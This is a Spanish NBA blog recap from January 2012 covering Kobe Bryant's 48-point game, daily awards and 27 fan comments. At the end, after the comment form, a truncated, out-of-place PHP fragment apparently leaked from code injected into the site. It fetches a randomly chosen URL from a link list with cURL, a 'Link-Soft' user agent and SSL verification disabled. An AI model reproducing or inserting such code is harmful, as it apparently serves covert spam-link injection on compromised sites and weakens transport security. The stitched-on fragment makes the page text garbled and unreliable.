La Crónica: Kobe Bryant anota 48 puntos

11 de January de 2012 por TheDeerHunter

11 choques con varias noticias interesantes para repasar brevemente.

Una noticia buena y otra mala para los Heat. Por un lado recuperaron al mejor Wade para la causa tras unos cuantos partidos de ausencia. Por el otro les cayó su 2ª derrota en la Bahía de Oakland con “Nanet” Robinson tocando la guitarra en su nuevo club como no le veíamos desde aquel día mágico de la final de hace dos años (106-111).

La siguiente noticia nos traslada a Washington: 1ª victoria de los locales (78-93) y buen segundo partido de Vesely (5 robos). Estuve tentado ayer de señalar que los Raptors se pondría con casi total seguridad en el 50%. Craso error hubiera sido jugársela por un equipo tan inestable como lo ha sido tradicionalmente. DeRozan viene estando para los leones y ni Calderon ni Bargnani rindieron al nivel que lo vienen haciendo. Por los Wizards los mejores fueron Young y Rashard. Andray Blacthe empezó el partido desde el banco en favor de Trevor Booker.

48 puntitos como 48 soles anotó Kobe Bryant en “tan sólo” 31 tiros a canasta (eso sí, anotando 18 todo hay que decirlo). Llegaban los Lakers sin suplentes interiores, pero era contra Phoenix. Curiosamente, o seguramente por el equipo que había en frente, tanto MWP como Walton cumplieron. 83-99 para los angelinos.

En Milwaukee, volvió Bogut tras resolver sus problemas familiares en las antípodas. Su equipo lo notó y consiguió la victoria (103-106) ante unos correctos Spurs en los que destacó Kawhi Leonard. El mejor, sin embargo fue Stephen Jackson en su mejor partido del año. Motivación frente a sus ex.

En el resto de encuentros, los Sixers lograron ante Kings su 7ª victoria (85-112), logrando su mejor comienzo desde la 2000-01; partidazo de Chandler Parsons en la victoria de Houston ante Charlotte (82-70); los Mavs alcanzaron el 50% ante Detroit (100-86); Bulls ganaron en Minneapolis a pesar de otro gran partido de Ricky (111-100); los Thunder hicieron lo propio en Memphis a pesar de Marc (100-95); Al Jefferson se merendó a los Cavs acumulando 5 victorias seguidas (105-113) y los Blazers doblegaron sin muchas dificultades a Clippers en un flojo partido de Chris Paul (97-105).

PREMIOS

MVP: Día de actuaciones soberbias. Kobe Bryant anotó 48 puntos que complementó con 5 rebotes, 3 asistencias y 3 robos. Por su parte, Derrick Rose anotó 31 puntos, repartió 11 asistencias y puso un par de tapones. Y finalmente, Al Jefferson anotó 30 puntos (13 de 17 en tiro), capturó 12 rebotes y puso también 2 tapones. Todos fueron los mejores en las respectivas victorias de sus equipos.


Rookie:
Un doble-doble más para Ricky Rubio, esta vez de 13 puntos y 12 asistencias. Gran partido también de Chandler Parsons de los Rockets, con 20 puntos y 7 rebotes. Ojito que le ha quitado el puesto de titular a Chase Budinger. Y Kawhni Leonard, de los Spurs, se fue hasta los 19 puntos y 4 robos.

Sorpresa: Stephen Jackson cuajó anoche una actuación a la altura de los mejores. 34 puntos (12 de 17 en tiro) y 8 asistencias. Si Milwaukee quiere optar a algo le necesita cerca de este nivel. Gran partido también para Evan Turner que se quedó a solo 2 asistencias del triple-doble (16 puntos, 10 rebotes y 8 asistencias). Jugar contra los Kings facilita este tipo de cosas. Y Dorrell Wright recuperó parte de la chispa perdida respecto el año pasado. 20 puntos (incluidos 6 triples) y 10 rebotes claves para imponerse a los Heat. Nate Robinson también revivió viejas glorias con 24 puntos, 4 rebotes, 4 asistencias y 4 robos. Y lo de Byron Mullens parece que va en serio (15 puntos-10 rebotes)

Decepción: Grant Hill no vivió su mejor noche y anotó solo 1 de sus 12 intentos. En todo caso el premio se lo lleva Monta Ellis a pesar de anotar 22 puntos. Anotó 9 de sus 25 intentos y perdió 9 balones igualando el récord de la temporada en posesión de Ben Gordon.

Esfuerzo en vano: La mejor pareja de la liga (Lebron James & Dwyane Wade) jugó a su nivel habitual pero no pudieron evitar la sorpredente derrota de su equipo frente los Warriors. Los 60 puntos que consiguieron entre los 2 no sirvieron para nada.

Imágenes | AP Photos / Getty Images

Comenta

27 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Con el partidazo de Dorrell Wright y el renacimiento de Robinson se me fastidia mi análisis, aunque ya es tarde para cambiarlo. no se me lancen a la yugular si ven que les pongo a parir un poquito, xd.

      Citar

  2. ralage dice:
    #2

    Grande Kobe, desde luego este año el será el máximo responsable del fracaso o éxito de estos Lakers

      Citar

  3. Vader dice:
    #3

    Esta claro que este año los amarillos no aspiran al anillo. ¿¿Tienes a Gasol y Bynum y el sistema es que Kobr tire 30 tiros?? Desde luego al que ficho a Brown le haran un monumento… en Boston.

    Saludos

      Citar

  4. nach dice:
    #4

    Lakers mientras esté Bryant ahí van a seguir siendo Kobe-sistema el 90% de las veces.

      Citar

  5. guisante dice:
    #5

    Que alguien comente el Bulls- Wolves y la actuación de ricky, este es el único sitio donde verdaderamente se aprecia algo de objetividad con la actuación de los nuestros, y como ayer no tuve el placer de verlo, pues agradecería que alguien me pusiese al día.

    Gracias!

      Citar

  6. Jonny dice:
    #6

    Hombre yo vi el partido de Miami y la relación de tiros de ellis es engañosa vale ese 1/7 en triples, pero es un jugador al que le dan muchos palos y no se le pitan faltas al mínimo roce cómo a otros

      Citar

  7. GreenPride dice:
    #7

    Pues noche de partidos interesantes. Para mí el más interesante era el Clips-Blazers. Los de Portland han empezado como un tiro y tienen un cinco muy interesante con Felton-Mathews-Wallace-Aldridge-Camby más Crawford saliendo del banco. Un equipo muy compensado que si recuperase a buen nivel a Oden podría dar muchos quebraderos de cabeza este año en un empeorado Oeste. Veremos si siguen a este nivel. Por otro lado, problemas para los Clippers si Paul no juega a su nivel. Sigo pensando que su banco es flojo a pesar de que Reggie Evans dará algún descanso interior y aportará defensa.
    Por otro lado el Kobe-sistema funcionó ante unas madres defensivas como los Suns. Los Lakers se van posicionando aunque les queda por mejorar bastante para aspirar al anillo.
    Sorprendente derrota de los Heat en un campo matagigantes como Oakland. Ningún favorito ganará fácil en la Bahía, aunque este equipo tan irregular luego pueda perder con cualquiera. El Big Three funcionó pero no hubo nada más y así es difícil aunque ya tiene tela que no pudieran con Nate.
    Por último, decir que me está sorprendiendo para muy bien la temporada de momento de Ricky. Muchos minutos, todo el mundo enamorado de su juego y él divirtiéndose y divirtiendo al personal haciendo buenos número en puntos y porcentajes y por supuesto en asistencias. De momento gran debut aunque todavía queda mucho.
    P.D. Qué lástima la mala cabeza de Stephen Jackson porque tiene juego para poder ser un grande.

      Citar

  8. ralage dice:
    #8

    Por cierto crack Shannon Brown, años defendiendo a Kobe en los entrenamientos y en la primera jugada ya le clava un 2+1!!!

      Citar

  9. Pop dice:
    #9

    guisante: Que alguien comente el Bulls- Wolves y la actuación de ricky, este es el único sitio donde verdaderamente se aprecia algo de objetividad con la actuación de los nuestros, y como ayer no tuve el placer de verlo, pues agradecería que alguien me pusiese al día. Gracias!

    Yo vi el partido, guisante.

    Fue un partido que empezó con un vendaval por parte de los Bulls, sobre todo de mano de Rose, que anotó los 7 primeros tiros que intentó, todo en el primer cuarto. A ello se le suma que los lobos iban como pollos sin cabeza y que Love no consiguió anotar en el primer cuarto (tan solo 2 tiros libres). De ahí la paliza en el primer cuarto, 33-17 para Chicago.

    La salida de Ricky frenó un poco la sangría, pero aún así durante el segundo cuarto se llegó a la máxima diferencia, 24 arriba para Bulls. Entonces llegaron los mejores momentos de RRR, en unos 6 minutos de chispa en los que repartió 7 asistencias, incluida una en el ultimo segundo, para que al descanso la diferencia fuera de 6 puntos.

    Como novedad, por primera vez Rubio salió a jugar desde el inicio del 3er cuarto, que fue un cuarto igualado, donde Love empezó a recuperar estadísticas y Ridnour a enchufar, por parte de Wolves, y donde los acompañantes de Rose, sobre todo Deng, aguantaron el tipo.

    Ya en el último cuarto Rose se puso intratable y enchufó 14 puntos creo, y además tanto Brewer como Deng anotaron en momentos decisivos y sentenciaron el partido a falta de 2 minutos. Ricky jugó casi completa la 2ª mitad, terminando con 36 minutos, y con 4 robos y 4 rebotes, además de los ya mencionados 13-12. La titularidad me da a mi que ya se huele, a pesar de la noche de Ridnour, que le entraba todo lo que tiraba.

    Un detalle que me gustaría añadir: Ricky volvió a perder 5 balones, y lleva una media de pérdidas bastante alta, más de 3 por partido, teniendo una de las peores estadísticas de asistencias/pérdidas. Ahora bien, en su defensa me gustaría decir que he visto todos los partidos de Minnesota, y la mayoria de pérdidas de Ricky consisten en asistencias fallidas, que son las pérdidas que menos repercuten en el equipo, ya que vienen a ser casi como tiros fallados. No son las típicas pérdidas que producen contraataques rivales y canasta.

    Si hay que destacar puntos flacos de Ricky, me parecen bastante más influyentes su clara desventaja para defender 1 contra 1 al base con balón, sobre todo en el aspecto físico, y sus fallos de tiros bastante claros, sobre todo los tiros que se busca él. Los tiros que intenta recibiendo balón tienen muchísimo mejor porcentaje.

      Citar

  10. Pop dice:
    #10

    Por cierto, aquí puedes leer a David Aldridge haciendo un extenso artículo sobre Ricky. Y se nota que evidentemente se ha convertido en un fan suyo.

    http://www.nba.com/2012/news/features/david_aldridge/01/09/ricky-rubio-minnesota-timberwolves-future/index.html

      Citar

  11. MagicJohnson32 dice:
    #11

    Palabras de Kobe tras el partido: “No está mal para el séptimo mejor jugador de la liga”. ESPN, in your face!

      Citar

  12. GreenPride dice:
    #12

    Esta Navidad he estado un tanto desconectado y acabo de ver que Eric Maynor se ha lesionado para toda la temporada. Baja sensible para los Thunder ya que era un muy buen recambio para Westbrook y suplía cuando a este se le iba la olla y lanzaba sin ton ni son. Lo dicho una baja importante para los Thunder que puede ser muy negativa para ellos en PO si es que no llega a tiempo para ellos.

      Citar

  13. Blade Petrovic dice:
    #13

    Menudo nombre mas cutre se ha puesto artest Kareem Abdul Jabbar mola pq es algo del gerrero en viado por dios pero meta world peace es una mierda nombre

      Citar

  14. melo15 dice:
    #14

    Es de payaso el nombre.

      Citar

  15. Cocinitas dice:
    #15

    Ya comente en el post de la jornada de ayer lo que me pareció el Wolves-Bulls. Sigo pensando que ayer a chicago le entro todo, por encima del 52% en tiros creo recordar, y especialmente a Rose que anotó un par de triples decisivos a pesar de estar bien defendido por Ricky. Yo no comparto lo de que Ricky defienda mal los unos contra uno, el problema es que cuantos bases son capaces de parar a Rose, Westbrook?? Rondo??? O quizá Wade??? El resto le ve pasar como las vacas al tren. Ricky va a ser Rookie del mes en el Oeste, y luchará con Irving hasta el final por el premio al Rookie del año. Viendo un partido de Ricky yo no me fijo en las estadisticas, yo simplemente le veo subir la bola y pienso, a ver con que me sorprende ahora? Esta causando furor en la mayoria de los grandes periodistas de la NBA y eso dice mucho a su favor.
    Bueno cambiando de tema, al acabar el partido me puse un rato el Lakers-Suns, que por cierto en mi ordenador no me dejaba cargarlo el League pass pero en el Ipad si, me pareció raro. No viene al caso pero también he descubierto que me deja ver los partidos del C+, porque vi sin problemas la prorroga del Warriors-Heat. Bueno del partido de Lakers decir que se equivocan totalmente, con el Kobesistema no pasaran de primera ronda. Ya se que es imposible pero la solución de estos Lakers era traspasar a Kobe. Joder con un buen base como Deron por ejemplo, y dos especialistas exteriores, más Bynum y Gasol serian imparables. Los vi ayer y no aprovechan nada el juego interior, ni nada el movimiento de balón es lamentable, y lo de Fisher no tiene nombre.

      Citar

  16. Ru dice:
    #16

    Los Lakers están jugando como lo hacían antes de la llegada de Gasol,noches de anotación para un Kobe con licencia para tirar -aunque desde luego no cualquiera se juega 31 tiros y mete 48 puntos,todo hay que decirlo-.Eso es muy bonito estadísticamente pero dudo mucho que sea efectivo en los playoffs y para mí los Lakers la siguen cagando -y Kobe Bryant también-.

    Esta noche menú de primer nivel,entre otros partidos:Miami – Clippers,Dallas – Boston,Atlanta – Indiana y Sixers – Knicks,el equipo con mejor banquillo frente al de peor.

      Citar

  17. Esteban dice:
    #17

    Byron mullens!!!!!!

    Madre, si este muchacho sigue en ese nivel, creo q es un acierto de jordan tan grande como sus errores pasados, creo q con esto tapa lo de brown…

    Q le costo mullens? Nada y hoy es el maximo candidato a juigador con mayor progreso,

    Clippers necesitan a bledsone y sumar dos suplentes mas YA si quiero llegar a finales de conferencia, de lo contrario imposible

    Philadelfia, gran racha pero no sew cruzo con potenciasn en breve lo hara y lo cortaran en seco

    Hoy heat vs clippers, quien marcara a lebron? Butler? Gomes? Evans? Griffin? Nadie? Jeje

      Citar

  18. Esteban dice:
    #18

    Viendo el partido de nate robinson, como lamento q los lakers no hayan intentado sumarlo, seria una bomba explosiva de la banca q los lakers no tienen, nate mas un alero, y este equipo, los lakers serian superiores a al city, y estarian en final de la nba, y alli a ver q pasa con el heat,

    Igual, creo q los lakers hoy estan en finales del oeste, solo veo superiores a los lakers al city, creo q a 7 partidos, los lakers son superiores a portland, clippers y obviamente mavericks

      Citar

  19. melo15 dice:
    #19

    Cocinitas no creo que los Nets aceptaran el traspaso

      Citar

  20. Sempren dice:
    #20

    Mirando las puras estadísticas, brutal el +42 de Mavs con Dirk en el campo, y curiosamente esa renta se perdió con… Brian Cardinal, quien acumuló un -28 xD

      Citar

  21. Pop dice:
    #21

    Cocinitas: Ya comente en el post de la jornada de ayer lo que me pareció el Wolves-Bulls. Sigo pensando que ayer a chicago le entro todo, por encima del 52% en tiros creo recordar, y especialmente a Rose que anotó un par de triples decisivos a pesar de estar bien defendido por Ricky. Yo no comparto lo de que Ricky defienda mal los unos contra uno, el problema es que cuantos bases son capaces de parar a Rose, Westbrook?? Rondo??? O quizá Wade??? El resto le ve pasar como las vacas al tren. Ricky va a ser Rookie del mes en el Oeste, y luchará con Irving hasta el final por el premio al Rookie del año. Viendo un partido de Ricky yo no me fijo en las estadisticas, yo simplemente le veo subir la bola y pienso, a ver con que me sorprende ahora? Esta causando furor en la mayoria de los grandes periodistas de la NBA y eso dice mucho a su favor.Bueno cambiando de tema, al acabar el partido me puse un rato el Lakers-Suns, que por cierto en mi ordenador no me dejaba cargarlo el League pass pero en el Ipad si, me pareció raro. No viene al caso pero también he descubierto que me deja ver los partidos del C+, porque vi sin problemas la prorroga del Warriors-Heat. Bueno del partido de Lakers decir que se equivocan totalmente, con el Kobesistema no pasaran de primera ronda. Ya se que es imposible pero la solución de estos Lakers era traspasar a Kobe. Joder con un buen base como Deron por ejemplo, y dos especialistas exteriores, más Bynum y Gasol serian imparables. Los vi ayer y no aprovechan nada el juego interior, ni nada el movimiento de balón es lamentable, y lo de Fisher no tiene nombre.

    Yo no digo que Ricky defienda mal en uno contra uno, sino que es uno de sus puntos flacos, debido casi exclusivamente al físico. Contra bases tan atléticos como es Rose está en clara desventaja.

      Citar

  22. Sempren dice:
    #22

    Aunque aquí Rose, aunque le sorprende, creo que le niega bien la penetración, también puede llegar a sufrir contra Ricky… http://www.youtube.com/watch?v=uHPDg9wSA9Q

      Citar

  23. Cocinitas dice:
    #23

    melo15:
    Cocinitas no creo que los Nets aceptaran el traspaso

    Melo Kobe tiene una clausula en su contrato por la cual no puede ser traspasado. Pero en caso de que lo pudiera ser los Nets no le harian ascos ya que Deron se ira este verano con viento fresco.

      Citar

  24. kantonyo dice:
    #24

    El día que DeMarcus Cousins se controle con las faltas estaremos hablando de uno de los mejores jugadores de la liga, hasta entonces será difícil que supere los 30 minutos de juego. Curiosa estadística:

    DeMarcus Cousins: 26,3 min – 14,9 ptos – 10,1 reb – 1,8 tap – 17,11 eff – 4,90 faltas
    9 partidos : 3p en 6 faltas – 4p en 5 faltas – 1p en 4 faltas – 1p en 2 faltas.

    Ranking faltas:

    1. DeMarcus Cousins : 4,90
    2. Amir Johnson : 4,00
    3. Jermaine O’Neal: 4,00
    4. Kris Humphries: 3,60
    5. Paul George: 3,50

      Citar

  25. kantonyo dice:
    #25

    Viendo el buen rendimiento de Markieff Morris en Phoenix, me sorprende bastante que Houston no cuente por ahora con su hermano gemelo Marcus, ya que a mi, en su etapa universitaria me parecía el bueno de los dos. No es que estemos hablando de una diferencia tan grande como los hermanos Lopez, pero si que mi impresión es que era mejor Marcus un 10-20%.

    Houston le ha enviado a la liga de desarrollo y no lo está haciendo nada mal:

    6 ene – 33 ptos y 16 rebotes
    7 ene – 32 ptos y 12 rebotes
    9 ene – 24 ptos y 9 rebotes

      Citar

  26. Sancho88 dice:
    #26

    kantonyo:
    Viendo el buen rendimiento de Markieff Morris en Phoenix, me sorprende bastante que Houston no cuente por ahora con su hermano gemelo Marcus, ya que a mi, en su etapa universitaria me parecía el bueno de los dos. No es que estemos hablando de una diferencia tan grande como los hermanos Lopez, pero si que mi impresión es que era mejor Marcus un 10-20%.

    Houston le ha enviado a la liga de desarrollo y no lo está haciendo nada mal:

    6 ene – 33 ptos y 16 rebotes
    7 ene – 32 ptos y 12 rebotes
    9 ene – 24 ptos y 9 rebotes

    Sí sí, aye ví los rosters de la D-League y se había cascado 29 puntos. Es sorperndente precísamente por eso, no creo yo que Houston ande muy sobrado de aleros como para prescindir tan drásticamente de una ronda alta de draft

      Citar

  27. Sancho88 dice:
    #27

    Que prórroga más rica de los Heat contra los Clippers. Me va a saber a gloria!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>